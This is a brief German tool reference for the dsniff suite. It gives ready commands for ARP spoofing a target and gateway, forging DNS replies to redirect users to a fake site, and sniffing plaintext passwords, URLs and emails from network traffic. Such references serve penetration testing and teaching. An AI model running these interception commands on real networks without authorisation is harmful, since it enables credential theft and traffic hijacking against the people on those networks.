dsniff ist eine Sammlung von Werkzeugen zum Durchführen von Netzwerkforensik und zum Aufspüren von Schwachstellen. Die Suite enthält verschiedene Tools zum Abfangen und Analysieren von Netzwerkverkehr. Siehe auch DNSChef.
arpspoof leitet den Netzwerkverkehr durch Ihren Rechner, indem es gefälschte ARP-Nachrichten sendet.
Aktivieren des IP-Forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i <interface> -t <target_ip> <gateway_ip>
dnsspoof fälscht DNS-Antworten, um Benutzer auf eine falsche Website umzuleiten.
echo "192.168.1.100 www.example.com" > dnsspoof_hosts
dnsspoof -i <interface> -f dnsspoof_hosts
dsniff fängt Klartextpasswörter und andere sensible Daten aus dem Netzwerkverkehr ab.
dsniff -i <interface>
urlsnarf fängt URLs auf und listet sie in einem leicht lesbaren Format.
urlsnarf -i eth0
mailsnarf fängt E-Mails im Klartext ab.
mailsnarf -i <interface>